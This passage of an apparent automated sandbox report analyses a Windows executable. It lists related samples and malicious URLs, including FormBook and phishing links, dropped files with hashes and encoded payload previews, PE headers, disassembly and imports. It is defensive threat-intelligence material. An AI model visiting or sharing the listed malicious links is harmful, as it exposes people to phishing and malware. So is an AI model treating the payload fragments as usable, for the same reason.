                                                    http://marketing.blizzfull.com/r/?to=https://outerbanksgear.com/act/ahges/brandy.wood@wildlife.ca.govGet hashmaliciousUnknownBrowse
                                                    • 50.28.99.49
                                                    http://readabilityscore.comGet hashmaliciousUnknownBrowse
                                                    • 67.225.218.25
                                                    BODIS-NJUSSolicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 199.59.243.226
                                                    firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                    • 199.59.243.226
                                                    firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                    • 199.59.243.226
                                                    firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                    • 199.59.243.226
                                                    firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                    • 199.59.243.226
                                                    firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                                    • 199.59.243.226
                                                    firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                    • 199.59.243.226
                                                    MV ALIADO - S-REQ-19-00064 List items.exeGet hashmaliciousFormBookBrowse
                                                    • 199.59.243.226
                                                    SecuriteInfo.com.Script.SNH-gen.5224.29912.exeGet hashmaliciousFormBookBrowse
                                                    • 199.59.243.226
                                                    http://readabilityscore.comGet hashmaliciousUnknownBrowse
                                                    • 199.59.243.205
                                                    ACPCAhttp://jan47nfhc.3utilities.com/#SAK0BE-SUREJACKZ3J6ZWdvcnouZ2FsYXJhQGNjYy5ldQ==Get hashmaliciousUnknownBrowse
                                                    • 162.0.209.83
                                                    RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.213.94
                                                    220204-TF1--00.exeGet hashmaliciousFormBookBrowse
                                                    • 162.55.254.209
                                                    20-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                                                    • 162.55.254.209
                                                    Rockwool group_SKM_C590368369060_417161.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 162.0.217.108
                                                    PO#86637.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.213.94
                                                    https://sweet-solomon.67-23-166-125.plesk.page/dave_jackson_tremblay/fouleebel--_--legardaise/victorien--_--.andre/tonysandrine.--_--henedieu/david.hernandez--_--aristizabalGet hashmaliciousUnknownBrowse
                                                    • 162.55.246.61
                                                    RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                                                    • 162.55.254.209
                                                    firmware.arm-linux-gnueabihf.elfGet hashmaliciousUnknownBrowse
                                                    • 162.48.22.207
                                                    PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.213.94

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Temp\049zKJ78K

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.121297215059106
                                                    Encrypted:false
                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\Okeghem

                                                    Download File
                                                    Process:C:\Users\user\Desktop\0XLuA614VK.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):86022
                                                    Entropy (8bit):4.178866841846399
                                                    Encrypted:false
                                                    SSDEEP:1536:IZdNJ184vEfdrTfoWX5eYZe6fjIzpEeAJlA:YdN0IWE0VIfAJG
                                                    MD5:351A84B23D9E278A7241FD1086E178C8
                                                    SHA1:10CC60CD6E89B6D0C2B375BFC4C7939B49B05650
                                                    SHA-256:F0B085F40976D8920799C7338A25DEA2B76719F61D0F015F805BC2EB079BC287
                                                    SHA-512:BBAE7474ADC078210393EE59489FAF74364498C398CD1BB221F9E89AED733E8C107BA2099C7063F6373AE0EA1217C5A4083897FF7D0CBCF471077DE94168CABB
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:30O78W35R35B38V62E65D63B38V31U65D63W63O63M30F32T30G30A30Q30K35U36B35L37S62S38N36L62R30I30J30Y30W30V30Q36O36H38W39A34G35G38I34N62A39S36S35D30A30W30Y30E30A30R36N36G38C39S34H64D38S36I62S61F37H32C30K30L30Y30J30A30H36R36C38Z39X35U35L38Y38F62S38G36S65M30U30Y30T30O30N30Q36A36M38T39B34T35I38U61M62A39T36W35O30T30E30J30N30M30P36V36H38B39Q34V64Q38G63U62V61C36O63M30N30U30D30U30S30V36I36W38O39U35O35E38D65I62E38L33I33J30P30E30F30A30X30Y36W36G38V39R34I35W39G30U62H39N33F32D30O30X30Z30A30R30W36Q36K38J39I34T64H39C32H62R61D32G65Y30N30X30Y30Y30P30P36R36B38T39S35O35K39G34G62T38J36V34R30M30R30S30G30M30W36I36I38D39Y34V35N39S36L62Z39Z36X63H30O30T30R30R30H30V36T36J38V39N34C64F39I38P62H61Q36G63U30N30R30S30Q30T30A36H36D38G39F35S35Y39Q61D33Z33U63Q30F36R36N38T39T34Z35Q39K63H62K39W36K65L30H30T30H30H30H30J36W36A38P39J38L64J34L34S66H66U66G66R66K66K62P61B37V34P30F30A30N30B30Y30M36S36W38K39I39K35Y34S36S66L66Z66F66D66O66E62S38I36U34M30U30D30H30M30I30D36J36G38F39A38L35E34S38M66A66D66L66J66E66W62V39U36J63E30M30C30D30J30M3

                                                    C:\Users\user\AppData\Local\Temp\autC864.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\0XLuA614VK.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):272384
                                                    Entropy (8bit):7.9934090783519185
                                                    Encrypted:true
                                                    SSDEEP:6144:GliSizvPXmMpg5ehcQvgP0FcKgF4m93rgD6AlyxfR60Ix1/:GllcnXmMRbgnWs3cMgx1/
                                                    MD5:A1FB5C2C967AA8558C7D23183F7AFD9C
                                                    SHA1:46A77E92EADE977BBF0EC71AFB2BC2A413E2AF3B
                                                    SHA-256:ACC62B73F9AFC1FFA76DFD1823BB3B6E2257EF8058CF8E7DAF733FD584ED9EF2
                                                    SHA-512:04E2A1888D8751774ECAF2D0A55BC92ACAC79E0212771355D8DA9C7D6644A72A574D1686CC065900D04C08EDC22B29560FCFAC7D2F9B5698544B65B3424B03EC
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:y.u..03XL...Z..p.W3....[D...SHVFKL4W0WY03XLIM6SHVFKL4W0WY0.XLIC).FV.B...1...g0%:mF!'14*!.4Q97_Gx.,mD&&v/%lp.cw4_W=bD@<wHVFKL4WIVP..8+.pV4.k&,...cPT.V...o(1.Q..7>.a1/!pV4.VFKL4W0W.u3X.HL6..K.KL4W0WY0.XNHF7XHVPOL4W0WY03X.ZM6SXVFK|0W0W.03HLIM4SHPFKL4W0W_03XLIM6SxRFKN4W0WY01X..M6CHVVKL4W WY 3XLIM6CHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL.#U/-03X.]I6SXVFKZ0W0GY03XLIM6SHVFKL.W07Y03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLI

                                                    C:\Users\user\AppData\Local\Temp\autC894.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\0XLuA614VK.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):43554
                                                    Entropy (8bit):7.821532738392043
                                                    Encrypted:false
                                                    SSDEEP:768:Wf6Iuqd0f4ibxUJKNtFqya/QHtfwDTiP3qWimuAKNcsrWwyQcB:a6VqOf4ipNXVaYHJwHiPknNcMcB
                                                    MD5:D03333BB1A2FC1DFA578E0A1D89A0ECD
                                                    SHA1:1431DB53B5F90FCA1B45D11090C389516E879192
                                                    SHA-256:BDBAB462F22FC6403D62F7037D0E9D1C8FDE99074B29B26FC4CD2D32D8456A44
                                                    SHA-512:BDEAE11C6D2F090023C6997055B35569453DB2EBC6048BB6AD0DCF93F97F5056AD055023822B4F15A07BB602A855029D174F17CF9B54C3CF77CD6E8D7092857B
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:EA06..P...).y.^g5.L.)..6.Qf.Z$.f....5P..6....:l.aF...9..g0.......3..fsj..kL...si.Ng8.L....3.Rfs.T.aY..*.9.X...S.sjD.....fsJ<.kG..)39.:m2...59..3.......E...S9....TP...."m4.L....$...Lh.9."g2..C..`..J.6..9...C..+S9.`....'.....EQ......0......>g0..QT...3.U&s...iT..i39.Vm1..QUI.......TP.....E*.9.X.b.L.5...6.T@...6.U.......qS... .5S..f...qO..@'.|.kE..(.i.....S&s:L.f..T..*0..X..@....3..sJL.j......."g9.L.`3...>.-+@(9.P&..e.g8.L. .%Rm4.-(s9. ...Lh.9..m5..Q@.p..P..Q...uS...`...6......biR...@.U..2..l@'..g9....9.8.v...c...mX.L...UP....).!...J...9..m4..U.....6..^.*.........Z..B..g9.L...d....fu....3.'(...8...L...3...!....<..)s`!......@.x...T...g9..).i.*g4.L.9..6.Uf....6.<...Bm1.L..!.@..@.......k <..aI.x.(...[6..&...6.Q&.DD..5...Y...W.@....Q.GP...\..).E..A8.....(.8..".j........:(..C.K.@......Q@L...6.U.sJ|.cE.?. .p..C..@.....E.L.`..@....lU..j.3.T.H.,....M.`..D....*..y....I..AD.....X.q.}@....j."..m@...Mh...X.*...@...........z..7T..2....4....6..I....ER.#...uRm2.M. .`.q

                                                    C:\Users\user\AppData\Local\Temp\avenses

                                                    Download File
                                                    Process:C:\Users\user\Desktop\0XLuA614VK.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):272384
                                                    Entropy (8bit):7.9934090783519185
                                                    Encrypted:true
                                                    SSDEEP:6144:GliSizvPXmMpg5ehcQvgP0FcKgF4m93rgD6AlyxfR60Ix1/:GllcnXmMRbgnWs3cMgx1/
                                                    MD5:A1FB5C2C967AA8558C7D23183F7AFD9C
                                                    SHA1:46A77E92EADE977BBF0EC71AFB2BC2A413E2AF3B
                                                    SHA-256:ACC62B73F9AFC1FFA76DFD1823BB3B6E2257EF8058CF8E7DAF733FD584ED9EF2
                                                    SHA-512:04E2A1888D8751774ECAF2D0A55BC92ACAC79E0212771355D8DA9C7D6644A72A574D1686CC065900D04C08EDC22B29560FCFAC7D2F9B5698544B65B3424B03EC
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:y.u..03XL...Z..p.W3....[D...SHVFKL4W0WY03XLIM6SHVFKL4W0WY0.XLIC).FV.B...1...g0%:mF!'14*!.4Q97_Gx.,mD&&v/%lp.cw4_W=bD@<wHVFKL4WIVP..8+.pV4.k&,...cPT.V...o(1.Q..7>.a1/!pV4.VFKL4W0W.u3X.HL6..K.KL4W0WY0.XNHF7XHVPOL4W0WY03X.ZM6SXVFK|0W0W.03HLIM4SHPFKL4W0W_03XLIM6SxRFKN4W0WY01X..M6CHVVKL4W WY 3XLIM6CHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL.#U/-03X.]I6SXVFKZ0W0GY03XLIM6SHVFKL.W07Y03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLI

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.182887764348203
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:0XLuA614VK.exe
                                                    File size:1'296'896 bytes
                                                    MD5:562cb5dcba0e691bf01ab2c020c0837e
                                                    SHA1:3ca5eb915edcce7da20a7b6046055cb11333647e
                                                    SHA256:4399aa607bbc0faabced85f15b59b4d01a50d79da07f8d6bc825e358ad417e52
                                                    SHA512:130e921e7bd869c6367a4fe664a5fe9df6432ff5ca3519d9fe4d378b52f4675b89ec9312a02ea8246868326d9c0c65703a45e289478afc7f26ce1ce6310077a9
                                                    SSDEEP:24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8awSX4F1d5Y/j20uMjwr4b:oTvC/MTQYxsWR7aw6yYpw4
                                                    TLSH:8055C0027391C062FFAB92334B5AF6115BBC79260123E61F13981DB9BE705B1563E7A3
                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                    File Icon

                                                    Icon Hash:aaf3e3e3938382a0

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x420577
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66C5182F [Tue Aug 20 22:26:55 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:1
                                                    File Version Major:5
                                                    File Version Minor:1
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:1
                                                    Import Hash:948cc502fe9226992dce9417f952fce3

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007F39A04CAFA3h
                                                    jmp 00007F39A04CA8AFh
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    push dword ptr [ebp+08h]
                                                    mov esi, ecx
                                                    call 00007F39A04CAA8Dh
                                                    mov dword ptr [esi], 0049FDF0h
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    and dword ptr [ecx+04h], 00000000h
                                                    mov eax, ecx
                                                    and dword ptr [ecx+08h], 00000000h
                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                    mov dword ptr [ecx], 0049FDF0h
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    push dword ptr [ebp+08h]
                                                    mov esi, ecx
                                                    call 00007F39A04CAA5Ah
                                                    mov dword ptr [esi], 0049FE0Ch
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    and dword ptr [ecx+04h], 00000000h
                                                    mov eax, ecx
                                                    and dword ptr [ecx+08h], 00000000h
                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                    mov dword ptr [ecx], 0049FE0Ch
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    mov esi, ecx
                                                    lea eax, dword ptr [esi+04h]
                                                    mov dword ptr [esi], 0049FDD0h
                                                    and dword ptr [eax], 00000000h
                                                    and dword ptr [eax+04h], 00000000h
                                                    push eax
                                                    mov eax, dword ptr [ebp+08h]
                                                    add eax, 04h
                                                    push eax
                                                    call 00007F39A04CD64Dh
                                                    pop ecx
                                                    pop ecx
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    lea eax, dword ptr [ecx+04h]
                                                    mov dword ptr [ecx], 0049FDD0h
                                                    push eax
                                                    call 00007F39A04CD698h
                                                    pop ecx
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    mov esi, ecx
                                                    lea eax, dword ptr [esi+04h]
                                                    mov dword ptr [esi], 0049FDD0h
                                                    push eax
                                                    call 00007F39A04CD681h
                                                    test byte ptr [ebp+08h], 00000001h
                                                    pop ecx

                                                    Rich Headers

                                                    Programming Language:
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x65f70.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x13a0000x7594.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0xd40000x65f700x66000d2b8fe8c365b219de1d9575c1cee3331False0.9358652152267157data7.910809203499628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x13a0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                    RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                    RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                    RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                    RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                    RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                    RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                    RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                    RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                    RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                    RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                    RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                    RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                    RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                    RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                    RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                    RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                    RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                    RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                    RT_RCDATA0xdc7b80x5d236data1.0003302804238074
                                                    RT_GROUP_ICON0x1399f00x76dataEnglishGreat Britain0.6610169491525424
                                                    RT_GROUP_ICON0x139a680x14dataEnglishGreat Britain1.25
                                                    RT_GROUP_ICON0x139a7c0x14dataEnglishGreat Britain1.15
                                                    RT_GROUP_ICON0x139a900x14dataEnglishGreat Britain1.25
                                                    RT_VERSION0x139aa40xdcdataEnglishGreat Britain0.6181818181818182
                                                    RT_MANIFEST0x139b800x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                    Imports

                                                    DLLImport
                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                    PSAPI.DLLGetProcessMemoryInfo
                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                    UxTheme.dllIsThemeActive
                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
